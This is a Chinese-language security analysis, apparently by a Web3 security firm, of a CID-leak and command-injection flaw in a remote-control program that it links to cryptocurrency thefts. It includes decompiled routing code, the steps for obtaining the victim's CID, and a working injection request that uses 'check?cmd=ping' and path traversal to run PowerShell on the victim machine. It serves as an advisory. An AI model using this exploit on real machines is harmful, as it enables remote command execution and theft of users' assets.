起因
最近许多Web3的加密货币持有者,在使用某远程控制软件期间,发生多起加密货币丢失事件。下图为其中一起事件。
黑客钱包地址:
0xbb3fd383d1c5540e52ef0a7bcb9433375793aeaf
这不得不联想到去年某远程控制软件http服务爆过cid泄漏+命令注入漏洞CNVD-2022-10270/CNVD-2022-03672;受害者每次启动该软件时,会自动随机开启一个大于40000的端口号作为http服务,在/check路由中,当参数cmd的值以ping或者nslookup开头时可以执行任意命令,攻击者可以下发c2 agent长期潜伏在受害者系统中观察。
影响版本:
个人版 for Windows <= 11.0.0.33162
简约版 <= V1.0.1.43315
分析
看一下login.cgi
v5 =(__int64 (__fastcall *)())operatornew(0x50ui64); v55 = v5; v54 =15i64; v53 =0i64; v51[0]=0; sub_1400F0690(v51,"login.cgi",9ui64); v6 = sub_140E2D6BC(v5, v51); v57 =&off_1410D3B20; v58 =(char(__fastcall *)(__int64, __int64))sub_140E1EE50; v59 = v52; v60 = a1; v61 =&v57; v66 =(_QWORD *)v6; if( v6 ) { v7 = v6 +8+*(int*)(*(_QWORD *)(v6 +8)+4i64); (*(void(__fastcall **)(__int64))(*(_QWORD *)v7 +8i64))(v7); } sub_140E2D85C(a1 +55,&v66,&v57); LOBYTE(v8)=1; sub_1400EEDC0(v51, v8,0i64); v56 =&v57; v9 =(__int64 (__fastcall *)())operatornew(0x50ui64); v55 = v9; v54 =15i64; v53 =0i64; v51[0]=0; sub_1400F0690(v51,(void*)"cgi-bin/login.cgi",0x11ui64); v10 = sub_140E2D6BC(v9, v51); v57 =&off_1410D3B20; v58 =(char(__fastcall *)(__int64, __int64))sub_140E1EE50; v59 = v52; v60 = a1; v61 =&v57; v66 =(_QWORD *)v10; if( v10 ) { v11 = v10 +8+*(int*)(*(_QWORD *)(v10 +8)+4i64); (*(void(__fastcall **)(__int64))(*(_QWORD *)v11 +8i64))(v11); } sub_140E2D85C(a1 +55,&v66,&v57); LOBYTE(v12)=1; sub_1400EEDC0(v51, v12,0i64); v56 =&v57; v13 =(__int64 (__fastcall *)())operatornew(0x50ui64); v55 = v13; v54 =15i64; v53 =0i64; v51[0]=0; sub_1400F0690(v51,(void*)"cgi-bin/rpc",0xBui64); v14 = sub_140E2D6BC(v13, v51); v57 =&off_1410D3B20; v58 = sub_140E1C954; v59 = v52; v60 = a1; v61 =&v57; v66 =(_QWORD *)v14; if( v14 ) { v15 = v14 +8+*(int*)(*(_QWORD *)(v14 +8)+4i64); (*(void(__fastcall **)(__int64))(*(_QWORD *)v15 +8i64))(v15); }
定位到cgi-bin/rpc
获得以下路由
v63 =(*(__int64 (__fastcall **)(_QWORD))(**(_QWORD **)(a1 +8)+104i64))(*(_QWORD *)(a1 +8)); sub_140320D80( (int)&qword_1414049C0, 1, (int)"..\\includes\\libsunloginclient\\client\\HttpDecideClientType.cpp", (int)"CHttpDecideTcpClientType::DecideClient", 205, "[Acceptor][HTTP] new RC HTTP connection %s,%s, plugin:%s, session:%s", v63); if((unsignedint)sub_140101DB0(v116,"login") && strcmp(v61,"express_login") && strcmp(v61,"cgi-bin/login.cgi") && strcmp(v61,"log") && strcmp(v61,"cgi-bin/rpc") && strcmp(v61,"transfer") && strcmp(v61,"cloudconfig") && strcmp(v61,"getfastcode") && strcmp(v61,"assist") && strcmp(v61,"cloudconfig") && strcmp(v61,"projection") && strcmp(v61,"getaddress") && strcmp(v61,"sunlogin-tools")) ... sub_1400F05E0(v116); goto LABEL_168; } } if(!(unsignedint)sub_140101DB0(v116,"login") ||!(unsignedint)sub_140101DB0(v116,"control") ||!strcmp(v61,"express_login") ||!strcmp(v61,"cgi-bin/login.cgi") ||!strcmp(v61,"cgi-bin/rpc") ||!strcmp(v61,"desktop.list") ||!strcmp(v61,"cloudconfig") ||!strcmp(v61,"check") ||!strcmp(v61,"transfer") ||!strcmp(v61,"getfastcode") ||!strcmp(v61,"assist") ||!strcmp(v61,"micro-live/enable") ||!strcmp(v61,"projection") ||!strcmp(v61,"getaddress")) { v103 =*(_QWORD *)(a1 +8);
根据网上披露的漏洞信息,先从cgi-bin/rpc路由获取的身份验证CID,可以看到action参数进行区分功能。
当action为verify-haras时,返回verify_string。
if(!(unsignedint)sub_140101DB0(v131,"verify-haras")) { sub_1400F0690(Src,"{\"__code\":0,\"enabled\":\"1\",\"verify_string\":\"",0x2Bui64); LOBYTE(v22)=1; v23 =(*(__int64 (__fastcall **)(_QWORD,char*, __int64))(**(_QWORD **)(*(_QWORD *)(a1 +416)+288i64)+144i64))( *(_QWORD *)(*(_QWORD *)(a1 +416)+288i64), v125, v22); sub_1400EEE40(Src, v23,0i64,-1i64); sub_1400F05E0(v125); sub_1400EEC60(Src,"\",\"code\":0} ",0xCui64); v73 =1; CxxThrowException(&v73,(_ThrowInfo *)&stru_1412F7B30); }
当action为login-type时,返回受害者设备相关信息。
if(!(unsignedint)sub_140101DB0(v131,"login-type")) { sub_1405ACBA0(v93); v16 ="0"; if((*(unsigned __int8 (__fastcall **)(_QWORD))(**(_QWORD **)(*(_QWORD *)(a1 +416)+288i64)+112i64))(*(_QWORD *)(*(_QWORD *)(a1 +416)+288i64))) ... memset(Buffer,0,sizeof(Buffer)); sub_140150A60( Buffer, "{\"__code\":0,\"use_custom\":%d,\"code\":0,\"version\":\"%s\",\"isbinding\":%s,\"isinstalled\":%s,\"isprojection\"" ":%s,\"platform\":\"%s\",\"mac\":\"%s\",\"request_need_pwd\":\"%s\",\"accept_request\":\"1\",\"support_file\":\"1\"" ",\"disable_remote_bind\":\"%s\"} "); if( Buffer[0]) { do ++v6; while( Buffer[v6]); v4 = v6; } sub_1400F0690(Src, Buffer, v4); v72 =1; CxxThrowException(&v72,(_ThrowInfo *)&stru_1412F7B30); }
除了以上还有fast-loginbind-request
再来看check路由,攻击者可以通过ping或nslookup进行构造恶意命令实现远程命令执行
getaddress路由可以获取到映射在外网固定端口的https服务地址,那这个地址是可以被网络资产搜索引擎抓取或被攻击者扫描到,所以攻击路径不局限于内网。
利用过程
每次启动时,会在40000+随机一个rpc接口的端口
第一步,获取受害者的CID。
第二步,添加CID进行身份认证Cookie:CID=Pvqsv5f5QDs8vYotYsUEFvTkqJuKeZIS并在受害者电脑执行任意命令。
查看受害者的系统文件
check?cmd=ping../../../../../../../../../windows/system32/WindowsPowerShell/v1.0/powershell.exe+dir+c:/
总结:
随着web3的持续发展,由于web3基础架构的隐匿性以及数字资产的高价值,黑客由传统的网络安全盗取数据转变在web3的生态里,盗取用户数字资产。很多黑客开始利用0day/1day来完成攻击目标设施,包括服务器,个人主机,钱包APP,移动客户端等,通过入侵这些系统,最终窃取用户的数字资产的目的,这里建议用户需要及时给系统打补丁,及时更新系统内的软件,不点击不明来源的连接,做好系统隔离,密钥需要在隔离系统中存放以及使用,不随便装不明来源的软件等。Numen 提供溯源,威胁情报,追币等服务,我们有行业顶级web3安全专家以及全球顶级的传统网络安全专家,持续研究,跟踪web3安全领域的问题,为您的数字资产安全保驾护航。
所有评论